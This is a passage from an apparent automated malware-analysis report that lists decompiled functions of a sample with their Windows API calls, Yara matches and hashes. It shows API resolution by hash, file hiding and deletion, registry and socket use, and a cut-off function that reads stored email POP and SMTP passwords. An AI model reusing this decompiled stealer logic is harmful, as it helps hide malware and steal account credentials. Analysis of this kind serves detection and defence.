                                        • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 40%
                                        			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                                        0x004060c6
                                        0x004060d5
                                        0x004060d8
                                        0x004060f4
                                        0x004060f6
                                        0x004060fb
                                        0x0040610a
                                        0x00406115
                                        0x0040611c
                                        0x0040611e
                                        0x00406121
                                        0x00000000
                                        0x0040612a
                                        0x0040612f

                                        APIs
                                        • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CheckMembershipToken
                                        • String ID:
                                        • API String ID: 1351025785-0
                                        • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                        • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                        • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                        • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                                        0x00403c68
                                        0x00403c70
                                        0x00403c78
                                        0x00403c82
                                        0x00403c8b
                                        0x00403c8f
                                        0x00403c72
                                        0x00403c76
                                        0x00403c76

                                        APIs
                                        • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateDirectory
                                        • String ID:
                                        • API String ID: 4241100979-0
                                        • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                        • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                        • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                        • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                                        0x0040643c
                                        0x00406445
                                        0x00406454

                                        APIs
                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID:
                                        • API String ID: 1721193555-0
                                        • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                        • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                        • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                        • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                                        0x00404eed
                                        0x00404ef2
                                        0x00404efd
                                        0x00404efd
                                        0x00404f07
                                        0x00404f0e

                                        APIs
                                        • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                        • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                        • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                        • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                                        0x00403bdd
                                        0x00403beb
                                        0x00403bee

                                        APIs
                                        • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileMove
                                        • String ID:
                                        • API String ID: 3562171763-0
                                        • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                        • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                        • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                        • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                        • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                        • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                        • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                                        0x0040428a
                                        0x00404297
                                        0x0040429a

                                        APIs
                                        • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                        • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                        • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                        • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                                        0x00404a27
                                        0x00404a35
                                        0x00404a38

                                        APIs
                                        • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                        • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                        • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                        • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                                        0x00403c4d
                                        0x00403c55
                                        0x00403c58

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                        • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                        • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                        • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                                        0x00403c15
                                        0x00403c1d
                                        0x00403c20

                                        APIs
                                        • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                        • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                        • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                        • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                                        0x00402c2c
                                        0x00402c34
                                        0x00402c37

                                        APIs
                                        • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                        • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                        • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                        • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                                        0x00403bfc
                                        0x00403c04
                                        0x00403c07

                                        APIs
                                        • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                        • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                        • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                        • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                                        0x00403bc4
                                        0x00403bcc
                                        0x00403bcf

                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                        • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                        • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                        • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                                        0x00404a0d
                                        0x00404a15
                                        0x00404a18

                                        APIs
                                        • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                        • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                        • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                        • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                                        0x00403b72
                                        0x00403b7a
                                        0x00403b7d

                                        APIs
                                        • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID:
                                        • API String ID: 1174141254-0
                                        • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                        • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                        • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                        • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: closesocket
                                        • String ID:
                                        • API String ID: 2781271927-0
                                        • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                        • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                        • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                        • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                                        0x00403fac
                                        0x00403fba
                                        0x00403fbe

                                        APIs
                                        • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                        • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                        • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                        • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                                        0x0040647f
                                        0x00406487
                                        0x0040648a

                                        APIs
                                        • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                        • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                        • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                        • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                                        0x004058f8
                                        0x00405903
                                        0x00405906

                                        APIs
                                        • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                        • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                        • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                        • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                                        0x00405932
                                        0x0040593d
                                        0x00405940

                                        APIs
                                        • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                        • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                        • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                        • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 0040438F
                                        • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                        • VariantInit.OLEAUT32(?), ref: 004043C4
                                        • SysAllocString.OLEAUT32(?), ref: 004043CD
                                        • VariantInit.OLEAUT32(?), ref: 00404414
                                        • SysAllocString.OLEAUT32(?), ref: 00404419
                                        • VariantInit.OLEAUT32(?), ref: 00404431
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InitVariant$AllocString$CreateInitializeInstance
                                        • String ID:
                                        • API String ID: 1312198159-0
                                        • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                        • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                        • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                        • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 88%
                                        			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
